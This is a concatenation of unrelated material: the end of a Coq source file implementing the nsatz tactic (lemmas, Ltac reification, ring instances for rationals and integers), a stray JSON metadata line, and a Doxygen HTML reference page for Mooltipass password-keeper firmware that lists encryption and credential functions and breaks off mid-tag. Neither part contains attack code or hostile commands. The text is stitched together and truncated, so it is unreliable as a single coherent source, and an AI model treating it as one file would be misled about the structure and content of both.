P == PhiR l P'. Proof. intros;apply (Peq_ok Rset Rext (gen_phiZ_morph Rset Rext Rtheory));trivial. Qed. Fixpoint Cond0 (A:Type) (Interp:A->R) (l:list A) : Prop := match l with | List.nil => True | a::l => Interp a == 0 /\ Cond0 A Interp l end. Lemma mult_l_correct : forall l la lp, Cond0 PolZ (PhiR l) lp -> PhiR l (mult_l la lp) == 0. Proof. induction la;simpl;intros. cring. destruct lp;trivial. simpl. cring. simpl in H;destruct H. rewrite PolZadd_correct. simpl. rewrite PolZmul_correct. simpl. rewrite H. rewrite IHla. cring. trivial. Qed. Lemma compute_list_correct : forall l lla lp, Cond0 PolZ (PhiR l) lp -> Cond0 PolZ (PhiR l) (compute_list lla lp). Proof. induction lla;simpl;intros;trivial. apply IHlla;simpl;split;trivial. apply mult_l_correct;trivial. Qed. Lemma check_correct : forall l lpe qe certif, check lpe qe certif = true -> Cond0 PEZ (PEevalR l) lpe -> PEevalR l qe == 0. Proof. unfold check;intros l lpe qe (lla, lq) H2 H1. apply PolZeq_correct with (l:=l) in H2. rewrite norm_correct, H2. apply mult_l_correct. apply compute_list_correct. clear H2 lq lla qe;induction lpe;simpl;trivial. simpl in H1;destruct H1. rewrite <- norm_correct;auto. Qed. (* fin *) Definition R2:= 1 + 1. Fixpoint IPR p {struct p}: R := match p with xH => ring1 | xO xH => 1+1 | xO p1 => R2*(IPR p1) | xI xH => 1+(1+1) | xI p1 => 1+(R2*(IPR p1)) end. Definition IZR1 z := match z with Z0 => 0 | Zpos p => IPR p | Zneg p => -(IPR p) end. Fixpoint interpret3 t fv {struct t}: R := match t with | (PEadd t1 t2) => let v1 := interpret3 t1 fv in let v2 := interpret3 t2 fv in (v1 + v2) | (PEmul t1 t2) => let v1 := interpret3 t1 fv in let v2 := interpret3 t2 fv in (v1 * v2) | (PEsub t1 t2) => let v1 := interpret3 t1 fv in let v2 := interpret3 t2 fv in (v1 - v2) | (PEopp t1) => let v1 := interpret3 t1 fv in (-v1) | (PEpow t1 t2) => let v1 := interpret3 t1 fv in pow v1 (N.to_nat t2) | (PEc t1) => (IZR1 t1) | PEO => 0 | PEI => 1 | (PEX _ n) => List.nth (pred (Pos.to_nat n)) fv 0 end. End nsatz1. Ltac equality_to_goal H x y:= (* eliminate trivial hypotheses, but it takes time!: let h := fresh "nH" in (assert (h:equality x y); [solve [cring] | clear H; clear h]) || *) try (generalize (@psos_r1 _ _ _ _ _ _ _ _ _ _ _ x y H); clear H) . Ltac equalities_to_goal := lazymatch goal with | H: (_ ?x ?y) |- _ => equality_to_goal H x y | H: (_ _ ?x ?y) |- _ => equality_to_goal H x y | H: (_ _ _ ?x ?y) |- _ => equality_to_goal H x y | H: (_ _ _ _ ?x ?y) |- _ => equality_to_goal H x y (* extension possible :-) *) | H: (?x == ?y) |- _ => equality_to_goal H x y end. (* lp est incluse dans fv. La met en tete. *) Ltac parametres_en_tete fv lp := match fv with | (@nil _) => lp | (@cons _ ?x ?fv1) => let res := AddFvTail x lp in parametres_en_tete fv1 res end. Ltac append1 a l := match l with | (@nil _) => constr:(cons a l) | (cons ?x ?l) => let l' := append1 a l in constr:(cons x l') end. Ltac rev l := match l with |(@nil _) => l | (cons ?x ?l) => let l' := rev l in append1 x l' end. Ltac nsatz_call_n info nparam p rr lp kont := (* idtac "Trying power: " rr;*) let ll := constr:(PEc info :: PEc nparam :: PEpow p rr :: lp) in (* idtac "calcul...";*) nsatz_compute ll; (* idtac "done";*) match goal with | |- (?c::PEpow _ ?r::?lq0)::?lci0 = _ -> _ => intros _; let lci := fresh "lci" in set (lci:=lci0); let lq := fresh "lq" in set (lq:=lq0); kont c rr lq lci end. Ltac nsatz_call radicalmax info nparam p lp kont := let rec try_n n := lazymatch n with | 0%N => fail | _ => (let r := eval compute in (N.sub radicalmax (N.pred n)) in nsatz_call_n info nparam p r lp kont) || let n' := eval compute in (N.pred n) in try_n n' end in try_n radicalmax. Ltac lterm_goal g := match g with ?b1 == ?b2 => constr:(b1::b2::nil) | ?b1 == ?b2 -> ?g => let l := lterm_goal g in constr:(b1::b2::l) end. Ltac reify_goal l le lb:= match le with nil => idtac | ?e::?le1 => match lb with ?b::?lb1 => (* idtac "b="; idtac b;*) let x := fresh "B" in set (x:= b) at 1; change x with (interpret3 e l); clear x; reify_goal l le1 lb1 end end. Ltac get_lpol g := match g with (interpret3 ?p _) == _ => constr:(p::nil) | (interpret3 ?p _) == _ -> ?g => let l := get_lpol g in constr:(p::l) end. (** We only make use of [discrR] if [nsatz] support for reals is loaded. To do this, we redefine this tactic in Nsatz.v to make use of real discrimination. *) Ltac nsatz_internal_discrR := idtac. Ltac nsatz_generic radicalmax info lparam lvar := let nparam := eval compute in (Z.of_nat (List.length lparam)) in match goal with |- ?g => let lb := lterm_goal g in match (match lvar with |(@nil _) => match lparam with |(@nil _) => let r := eval red in (list_reifyl (lterm:=lb)) in r |_ => match eval red in (list_reifyl (lterm:=lb)) with |(?fv, ?le) => let fv := parametres_en_tete fv lparam in (* we reify a second time, with the good order for variables *) let r := eval red in (list_reifyl (lterm:=lb) (lvar:=fv)) in r end end |_ => let fv := parametres_en_tete lvar lparam in let r := eval red in (list_reifyl (lterm:=lb) (lvar:=fv)) in r end) with |(?fv, ?le) => reify_goal fv le lb ; match goal with |- ?g => let lp := get_lpol g in let lpol := eval compute in (List.rev lp) in intros; let SplitPolyList kont := match lpol with | ?p2::?lp2 => kont p2 lp2 | _ => idtac "polynomial not in the ideal" end in SplitPolyList ltac:(fun p lp => let p21 := fresh "p21" in let lp21 := fresh "lp21" in set (p21:=p) ; set (lp21:=lp); (* idtac "nparam:"; idtac nparam; idtac "p:"; idtac p; idtac "lp:"; idtac lp; *) nsatz_call radicalmax info nparam p lp ltac:(fun c r lq lci => let q := fresh "q" in set (q := PEmul c (PEpow p21 r)); let Hg := fresh "Hg" in assert (Hg:check lp21 q (lci,lq) = true); [ (vm_compute;reflexivity) || idtac "invalid nsatz certificate" | let Hg2 := fresh "Hg" in assert (Hg2: (interpret3 q fv) == 0); [ (*simpl*) idtac; generalize (@check_correct _ _ _ _ _ _ _ _ _ _ _ fv lp21 q (lci,lq) Hg); let cc := fresh "H" in (*simpl*) idtac; intro cc; apply cc; clear cc; (*simpl*) idtac; repeat (split;[assumption|idtac]); exact I | (*simpl in Hg2;*) (*simpl*) idtac; apply Rintegral_domain_pow with (interpret3 c fv) (N.to_nat r); (*simpl*) idtac; try apply integral_domain_one_zero; try apply integral_domain_minus_one_zero; try trivial; try exact integral_domain_one_zero; try exact integral_domain_minus_one_zero || (solve [simpl; unfold R2, equality, eq_notation, addition, add_notation, one, one_notation, multiplication, mul_notation, zero, zero_notation; nsatz_internal_discrR || lia ]) || ((*simpl*) idtac) || idtac "could not prove discrimination result" ] ] ) ) end end end . Ltac nsatz_default:= intros; try apply (@psos_r1b _ _ _ _ _ _ _ _ _ _ _); match goal with |- (@equality ?r _ _ _) => repeat equalities_to_goal; nsatz_generic 6%N 1%Z (@nil r) (@nil r) end. Tactic Notation "nsatz" := nsatz_default. Tactic Notation "nsatz" "with" "radicalmax" ":=" constr(radicalmax) "strategy" ":=" constr(info) "parameters" ":=" constr(lparam) "variables" ":=" constr(lvar):= intros; try apply (@psos_r1b _ _ _ _ _ _ _ _ _ _ _); match goal with |- (@equality ?r _ _ _) => repeat equalities_to_goal; nsatz_generic radicalmax info lparam lvar end. (* Rational numbers *) From Coq Require Import QArith. Instance Qops: (@Ring_ops Q 0%Q 1%Q Qplus Qmult Qminus Qopp Qeq) := { }. Instance Qri : (Ring (Ro:=Qops)). constructor. try apply Q_Setoid. apply Qplus_comp. apply Qmult_comp. apply Qminus_comp. apply Qopp_comp. exact Qplus_0_l. exact Qplus_comm. apply Qplus_assoc. exact Qmult_1_l. exact Qmult_1_r. apply Qmult_assoc. apply Qmult_plus_distr_l. intros. apply Qmult_plus_distr_r. reflexivity. exact Qplus_opp_r. Defined. Lemma Q_one_zero: not (Qeq 1%Q 0%Q). Proof. unfold Qeq. simpl. lia. Qed. Instance Qcri: (Cring (Rr:=Qri)). red. exact Qmult_comm. Defined. Instance Qdi : (Integral_domain (Rcr:=Qcri)). constructor. exact Qmult_integral. exact Q_one_zero. Defined. (* Integers *) Lemma Z_one_zero: 1%Z <> 0%Z. Proof. lia. Qed. Instance Zcri: (Cring (Rr:=Zr)). red. exact Z.mul_comm. Defined. Instance Zdi : (Integral_domain (Rcr:=Zcri)). constructor. exact Zmult_integral. exact Z_one_zero. Defined.
{ "pile_set_name": "Github" }
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/> <meta http-equiv="X-UA-Compatible" content="IE=9"/> <meta name="generator" content="Doxygen 1.8.11"/> <title>Mooltipass: src/LOGIC/logic_aes_and_comms.c File Reference</title> <link href="tabs.css" rel="stylesheet" type="text/css"/> <script type="text/javascript" src="jquery.js"></script> <script type="text/javascript" src="dynsections.js"></script> <link href="search/search.css" rel="stylesheet" type="text/css"/> <script type="text/javascript" src="search/searchdata.js"></script> <script type="text/javascript" src="search/search.js"></script> <script type="text/javascript"> $(document).ready(function() { init_search(); }); </script> <link href="doxygen.css" rel="stylesheet" type="text/css" /> </head> <body> <div id="top"><!-- do not remove this div, it is closed by doxygen! --> <div id="titlearea"> <table cellspacing="0" cellpadding="0"> <tbody> <tr style="height: 56px;"> <td id="projectlogo"><img alt="Logo" src="0_Mooltipass.png"/></td> <td id="projectalign" style="padding-left: 0.5em;"> <div id="projectname">Mooltipass </div> <div id="projectbrief">Offline Password Keeper</div> </td> </tr> </tbody> </table> </div> <!-- end header part --> <!-- Generated by Doxygen 1.8.11 --> <script type="text/javascript"> var searchBox = new SearchBox("searchBox", "search",false,'Search'); </script> <div id="navrow1" class="tabs"> <ul class="tablist"> <li><a href="index.html"><span>Main&#160;Page</span></a></li> <li><a href="pages.html"><span>Related&#160;Pages</span></a></li> <li><a href="annotated.html"><span>Data&#160;Structures</span></a></li> <li class="current"><a href="files.html"><span>Files</span></a></li> <li> <div id="MSearchBox" class="MSearchBoxInactive"> <span class="left"> <img id="MSearchSelect" src="search/mag_sel.png" onmouseover="return searchBox.OnSearchSelectShow()" onmouseout="return searchBox.OnSearchSelectHide()" alt=""/> <input type="text" id="MSearchField" value="Search" accesskey="S" onfocus="searchBox.OnSearchFieldFocus(true)" onblur="searchBox.OnSearchFieldFocus(false)" onkeyup="searchBox.OnSearchFieldChange(event)"/> </span><span class="right"> <a id="MSearchClose" href="javascript:searchBox.CloseResultsWindow()"><img id="MSearchCloseImg" border="0" src="search/close.png" alt=""/></a> </span> </div> </li> </ul> </div> <div id="navrow2" class="tabs2"> <ul class="tablist"> <li><a href="files.html"><span>File&#160;List</span></a></li> <li><a href="globals.html"><span>Globals</span></a></li> </ul> </div> <!-- window showing the filter options --> <div id="MSearchSelectWindow" onmouseover="return searchBox.OnSearchSelectShow()" onmouseout="return searchBox.OnSearchSelectHide()" onkeydown="return searchBox.OnSearchSelectKey(event)"> </div> <!-- iframe showing the search results (closed by default) --> <div id="MSearchResultsWindow"> <iframe src="javascript:void(0)" frameborder="0" name="MSearchResults" id="MSearchResults"> </iframe> </div> <div id="nav-path" class="navpath"> <ul> <li class="navelem"><a class="el" href="dir_68267d1309a1af8e8297ef4c3efbcdba.html">src</a></li><li class="navelem"><a class="el" href="dir_1e282d0b243de6680512bf201346d37b.html">LOGIC</a></li> </ul> </div> </div><!-- top --> <div class="header"> <div class="summary"> <a href="#func-members">Functions</a> &#124; <a href="#var-members">Variables</a> </div> <div class="headertitle"> <div class="title">logic_aes_and_comms.c File Reference</div> </div> </div><!--header--> <div class="contents"> <p>Firmware logic - encryption and communications Created: 18/08/2014 Author: Mathieu Stephan. <a href="#details">More...</a></p> <div class="textblock"><code>#include &lt;util/atomic.h&gt;</code><br /> <code>#include &lt;string.h&gt;</code><br /> <code>#include &quot;<a class="el" href="gui__credentials__functions_8h_source.html">gui_credentials_functions.h</a>&quot;</code><br /> <code>#include &quot;<a class="el" href="logic__fwflash__storage_8h_source.html">logic_fwflash_storage.h</a>&quot;</code><br /> <code>#include &quot;<a class="el" href="gui__screen__functions_8h_source.html">gui_screen_functions.h</a>&quot;</code><br /> <code>#include &quot;<a class="el" href="logic__aes__and__comms_8h_source.html">logic_aes_and_comms.h</a>&quot;</code><br /> <code>#include &quot;usb_cmd_parser.h&quot;</code><br /> <code>#include &quot;<a class="el" href="timer__manager_8h_source.html">timer_manager.h</a>&quot;</code><br /> <code>#include &quot;<a class="el" href="logic__eeprom_8h_source.html">logic_eeprom.h</a>&quot;</code><br /> <code>#include &quot;hid_defines.h&quot;</code><br /> <code>#include &quot;<a class="el" href="aes256__ctr_8h_source.html">aes256_ctr.h</a>&quot;</code><br /> <code>#include &quot;<a class="el" href="node__mgmt_8h_source.html">node_mgmt.h</a>&quot;</code><br /> <code>#include &quot;<a class="el" href="flash__mem_8h_source.html">flash_mem.h</a>&quot;</code><br /> <code>#include &quot;defines.h&quot;</code><br /> <code>#include &quot;<a class="el" href="delays_8h_source.html">delays.h</a>&quot;</code><br /> <code>#include &quot;usb.h&quot;</code><br /> <code>#include &quot;rng.h&quot;</code><br /> </div><table class="memberdecls"> <tr class="heading"><td colspan="2"><h2 class="groupheader"><a name="func-members"></a> Functions</h2></td></tr> <tr class="memitem:af605926c53e38170c91ca278dd84ae66"><td class="memItemLeft" align="right" valign="top">uint8_t&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="logic__aes__and__comms_8c.html#af605926c53e38170c91ca278dd84ae66">getSmartCardInsertedUnlocked</a> (void)</td></tr> <tr class="memdesc:af605926c53e38170c91ca278dd84ae66"><td class="mdescLeft">&#160;</td><td class="mdescRight">know if the smartcard is inserted and unlocked <a href="#af605926c53e38170c91ca278dd84ae66">More...</a><br /></td></tr> <tr class="separator:af605926c53e38170c91ca278dd84ae66"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:aa23fbe207819d840f0a42b9da5ce1112"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="aa23fbe207819d840f0a42b9da5ce1112"></a> void&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="logic__aes__and__comms_8c.html#aa23fbe207819d840f0a42b9da5ce1112">setSmartCardInsertedUnlocked</a> (void)</td></tr> <tr class="memdesc:aa23fbe207819d840f0a42b9da5ce1112"><td class="mdescLeft">&#160;</td><td class="mdescRight">set the smartcard is inserted and unlocked <br /></td></tr> <tr class="separator:aa23fbe207819d840f0a42b9da5ce1112"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:a3e693658d71a156f5c87c89f47962050"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a3e693658d71a156f5c87c89f47962050"></a> void&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="logic__aes__and__comms_8c.html#a3e693658d71a156f5c87c89f47962050">clearSmartCardInsertedUnlocked</a> (void)</td></tr> <tr class="memdesc:a3e693658d71a156f5c87c89f47962050"><td class="mdescLeft">&#160;</td><td class="mdescRight">set the smartcard is removed (called by interrupt!) <br /></td></tr> <tr class="separator:a3e693658d71a156f5c87c89f47962050"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:ad4185a8a95564978161535d5ca311cd2"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="ad4185a8a95564978161535d5ca311cd2"></a> void&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="logic__aes__and__comms_8c.html#ad4185a8a95564978161535d5ca311cd2">eraseFlashUsersContents</a> (void)</td></tr> <tr class="memdesc:ad4185a8a95564978161535d5ca311cd2"><td class="mdescLeft">&#160;</td><td class="mdescRight">Erase everything inside the flash. <br /></td></tr> <tr class="separator:ad4185a8a95564978161535d5ca311cd2"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:a9cc73786e07d95f0a8eb1027c8b12f8b"><td class="memItemLeft" align="right" valign="top">void&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="logic__aes__and__comms_8c.html#a9cc73786e07d95f0a8eb1027c8b12f8b">initEncryptionHandling</a> (uint8_t *aes_key, uint8_t *nonce)</td></tr> <tr class="memdesc:a9cc73786e07d95f0a8eb1027c8b12f8b"><td class="mdescLeft">&#160;</td><td class="mdescRight">Initialize our encryption/decryption part. <a href="#a9cc73786e07d95f0a8eb1027c8b12f8b">More...</a><br /></td></tr> <tr class="separator:a9cc73786e07d95f0a8eb1027c8b12f8b"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:adfa8333245b42cbc18827c77b09fbabe"><td class="memItemLeft" align="right" valign="top">void&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="logic__aes__and__comms_8c.html#adfa8333245b42cbc18827c77b09fbabe">initUserFlashContext</a> (uint8_t user_id)</td></tr> <tr class="memdesc:adfa8333245b42cbc18827c77b09fbabe"><td class="mdescLeft">&#160;</td><td class="mdescRight">Initialize our flash context. <a href="#adfa8333245b42cbc18827c77b09fbabe">More...</a><br /></td></tr> <tr class="separator:adfa8333245b42cbc18827c77b09fbabe"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:a36e48576e34a7d177f2e4d26ab754e69"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a36e48576e34a7d177f2e4d26ab754e69"></a> uint16_t&#160;</td><td class="memItemRight" valign="bottom"><b>searchForServiceName</b> (uint8_t *name, uint8_t mode, uint8_t type)</td></tr> <tr class="separator:a36e48576e34a7d177f2e4d26ab754e69"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:ab745dd39d25124d24f134c82a7f92884"><td class="memItemLeft" align="right" valign="top">uint16_t&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="logic__aes__and__comms_8c.html#ab745dd39d25124d24f134c82a7f92884">searchForLoginInGivenParent</a> (uint16_t parent_addr, uint8_t *name)</td></tr> <tr class="separator:ab745dd39d25124d24f134c82a7f92884"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:a35709638dca7acadeec3391a0e79cbcd"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a35709638dca7acadeec3391a0e79cbcd"></a> void&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="logic__aes__and__comms_8c.html#a35709638dca7acadeec3391a0e79cbcd">ctrPreEncryptionTasks</a> (void)</td></tr> <tr class="memdesc:a35709638dca7acadeec3391a0e79cbcd"><td class="mdescLeft">&#160;</td><td class="mdescRight">CTR pre encryption tasks. <br /></td></tr> <tr class="separator:a35709638dca7acadeec3391a0e79cbcd"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:a853f383eaf0065dfbdb3dbcfb3eca04b"><td class="memItemLeft" align="right" valign="top">void&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="logic__aes__and__comms_8c.html#a853f383eaf0065dfbdb3dbcfb3eca04b">decrypt32bBlockOfDataAndClearCTVFlag</a> (uint8_t *data, uint8_t *ctr)</td></tr> <tr class="memdesc:a853f383eaf0065dfbdb3dbcfb3eca04b"><td class="mdescLeft">&#160;</td><td class="mdescRight">Decrypt a block of data, clear credential_timer_valid. <a href="#a853f383eaf0065dfbdb3dbcfb3eca04b">More...</a><br /></td></tr> <tr class="separator:a853f383eaf0065dfbdb3dbcfb3eca04b"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:abe78ac5d68297cef1ed356c0741840ab"><td class="memItemLeft" align="right" valign="top">void&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="logic__aes__and__comms_8c.html#abe78ac5d68297cef1ed356c0741840ab">encrypt32bBlockOfDataAndClearCTVFlag</a> (uint8_t *data, uint8_t *ctr)</td></tr> <tr class="memdesc:abe78ac5d68297cef1ed356c0741840ab"><td class="mdescLeft">&#160;</td><td class="mdescRight">Encrypt a block of data, clear credential_timer_valid. <a href="#abe78ac5d68297cef1ed356c0741840ab">More...</a><br /></td></tr> <tr class="separator:abe78ac5d68297cef1ed356c0741840ab"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:ac858e3c344d7f63ca46362e88708c41e"><td class="memItemLeft" align="right" valign="top">RET_TYPE&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="logic__aes__and__comms_8c.html#ac858e3c344d7f63ca46362e88708c41e">setCurrentContext</a> (uint8_t *name, uint8_t type)</td></tr> <tr class="memdesc:ac858e3c344d7f63ca46362e88708c41e"><td class="mdescLeft">&#160;</td><td class="mdescRight">Set our current context. <a href="#ac858e3c344d7f63ca46362e88708c41e">More...</a><br /></td></tr> <tr class="separator:ac858e3c344d7f63ca46362e88708c41e"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:ae22526bcee06cd313f9a3e126e86fcb7"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="ae22526bcee06cd313f9a3e126e86fcb7"></a> RET_TYPE&#160;</td><td class="memItemRight" valign="bottom"><b>addNewContext</b> (uint8_t *name, uint8_t length, uint8_t type)</td></tr> <tr class="separator:ae22526bcee06cd313f9a3e126e86fcb7"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:a4b874d6b7f6e9eec80b191030da5fa6c"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a4b874d6b7f6e9eec80b191030da5fa6c"></a> RET_TYPE&#160;</td><td class="memItemRight" valign="bottom"><b>getLoginForContext</b> (char *buffer)</td></tr> <tr class="separator:a4b874d6b7f6e9eec80b191030da5fa6c"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:a9097014a9a6278dd02ff4448cd2dfc94"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a9097014a9a6278dd02ff4448cd2dfc94"></a> RET_TYPE&#160;</td><td class="memItemRight" valign="bottom"><b>getPasswordForContext</b> (char *buffer)</td></tr> <tr class="separator:a9097014a9a6278dd02ff4448cd2dfc94"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:a3c22892bb4d89ede68299edd4755858a"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a3c22892bb4d89ede68299edd4755858a"></a> RET_TYPE&#160;</td><td class="memItemRight" valign="bottom"><b>getDescriptionForContext</b> (char *buffer)</td></tr> <tr class="separator:a3c22892bb4d89ede68299edd4755858a"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:a9c7c9fab57070ffc66fa6fcb64c0f6e0"><td class="memItemLeft" align="right" valign="top">RET_TYPE&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="logic__aes__and__comms_8c.html#a9c7c9fab57070ffc66fa6fcb64c0f6e0">setLoginForContext</a> (uint8_t *name, uint8_t length)</td></tr> <tr class="memdesc:a9c7c9fab57070ffc66fa6fcb64c0f6e0"><td class="mdescLeft">&#160;</td><td class="mdescRight">Set login for current context. <a href="#a9c7c9fab57070ffc66fa6fcb64c0f6e0">More...</a><br /></td></tr> <tr class="separator:a9c7c9fab57070ffc66fa6fcb64c0f6e0"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:a13c7de9328d80459f78fa702bb0bd230"><td class="memItemLeft" align="right" valign="top">RET_TYPE&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="logic__aes__and__comms_8c.html#a13c7de9328d80459f78fa702bb0bd230">setPasswordForContext</a> (uint8_t *password, uint8_t length)</td></tr> <tr class="memdesc:a13c7de9328d80459f78fa702bb0bd230"><td class="mdescLeft">&#160;</td><td class="mdescRight">Set password for current context. <a href="#a13c7de9328d80459f78fa702bb0bd230">More...</a><br /></td></tr> <tr class="separator:a13c7de9328d80459f78fa702bb0bd230"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:acba821e3c7d55c66ac7672fe3776edbf"><td class="memItemLeft" align="right" valign="top">RET_TYPE&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="logic__aes__and__comms_8c.html#acba821e3c7d55c66ac7672fe3776edbf">addDataForDataContext</a> (uint8_t *data, uint8_t last_packet_flag)</td></tr> <tr class="memdesc:acba821e3c7d55c66ac7672fe3776edbf"><td class="mdescLeft">&#160;</td><td class="mdescRight">Add 32 bytes of data to our current data parent. <a href="#acba821e3c7d55c66ac7672fe3776edbf">More...</a><br /></td></tr> <tr class="separator:acba821e3c7d55c66ac7672fe3776edbf"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:a1d3f3d204d12767f25eb6c32a34b5d43"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a1d3f3d204d12767f25eb6c32a34b5d43"></a> RET_TYPE&#160;</td><td class="memItemRight" valign="bottom"><b>get32BytesDataForCurrentService</b> (uint8_t *buffer)</td></tr> <tr class="separator:a1d3f3d204d12767f25eb6c32a34b5d43"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:a8c0587ee01ee730da95ae2e2b257cca4"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a8c0587ee01ee730da95ae2e2b257cca4"></a> RET_TYPE&#160;</td><td class="memItemRight" valign="bottom"><b>checkPasswordForContext</b> (uint8_t *password)</td></tr> <tr class="separator:a8c0587ee01ee730da95ae2e2b257cca4"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:a0a33ec54fda2e3bddc3e2ada1ab41899"><td class="memItemLeft" align="right" valign="top">void&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="logic__aes__and__comms_8c.html#a0a33ec54fda2e3bddc3e2ada1ab41899">askUserForLoginAndPasswordKeybOutput</a> (uint16_t child_address, char *service_name)</td></tr> <tr class="memdesc:a0a33ec54fda2e3bddc3e2ada1ab41899"><td class="mdescLeft">&#160;</td><td class="mdescRight">Ask the user to enter the login password of a given child. <a href="#a0a33ec54fda2e3bddc3e2ada1ab41899">More...</a><br /></td></tr> <tr class="separator:a0a33ec54fda2e3bddc3e2ada1ab41899"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:a63ecc1b3ca1b4116bc129ba8339bf1cc"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a63ecc1b3ca1b4116bc129ba8339bf1cc"></a> void&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="logic__aes__and__comms_8c.html#a63ecc1b3ca1b4116bc129ba8339bf1cc">favoritePickingLogic</a> (void)</td></tr> <tr class="memdesc:a63ecc1b3ca1b4116bc129ba8339bf1cc"><td class="mdescLeft">&#160;</td><td class="mdescRight">Logic for picking a favorite's credentials. <br /></td></tr> <tr class="separator:a63ecc1b3ca1b4116bc129ba8339bf1cc"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:aa32f000bf83764ae5552c9027d8f8c8f"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="aa32f000bf83764ae5552c9027d8f8c8f"></a> void&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="logic__aes__and__comms_8c.html#aa32f000bf83764ae5552c9027d8f8c8f">loginSelectLogic</a> (void)</td></tr> <tr class="memdesc:aa32f000bf83764ae5552c9027d8f8c8f"><td class="mdescLeft">&#160;</td><td class="mdescRight">Logic for finding a given login. <br /></td></tr> <tr class="separator:aa32f000bf83764ae5552c9027d8f8c8f"><td class="memSeparator" colspan="2">&#160;</td></tr> </table><table class="memberdecls"> <tr class="heading"><td colspan="2"><h2 class="groupheader"><a name="var-members"></a> Variables</h2></td></tr> <tr class="memitem:a12d527d085c5c8eac20c653d516273f5"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a12d527d085c5c8eac20c653d516273f5"></a> uint8_t&#160;</td><td class="memItemRight" valign="bottom"><b>smartcard_inserted_unlocked</b> = FALSE</td></tr> <tr class="separator:a12d527d085c5c8eac20c653d516273f5"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:a4d3f926d333851c4bb7c348f15168217"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a4d3f926d333851c4bb7c348f15168217"></a> uint8_t&#160;</td><td class="memItemRight" valign="bottom"><b>current_nonce</b> [AES256_CTR_LENGTH]</td></tr> <tr class="separator:a4d3f926d333851c4bb7c348f15168217"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:a942c86acc4040f060bc85e5ccd0e6a07"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a942c86acc4040f060bc85e5ccd0e6a07"></a> uint16_t&#160;</td><td class="memItemRight" valign="bottom"><b>selected_login_child_node_addr</b></td></tr> <tr class="separator:a942c86acc4040f060bc85e5ccd0e6a07"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:a07914f8f3d82c52a6cf6b1fcc70732c5"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a07914f8f3d82c52a6cf6b1fcc70732c5"></a> uint8_t&#160;</td><td class="memItemRight" valign="bottom"><b>selected_login_flag</b> = FALSE</td></tr> <tr class="separator:a07914f8f3d82c52a6cf6b1fcc70732c5"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:a251f84f88c5b061134c26ff13a3e494e"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a251f84f88c5b061134c26ff13a3e494e"></a> uint8_t&#160;</td><td class="memItemRight" valign="bottom"><b>data_context_valid_flag</b> = FALSE</td></tr> <tr class="separator:a251f84f88c5b061134c26ff13a3e494e"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:ab689689ef283c40dc14cb0a9eef6c3b4"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="ab689689ef283c40dc14cb0a9eef6c3b4"></a> uint8_t&#160;</td><td class="memItemRight" 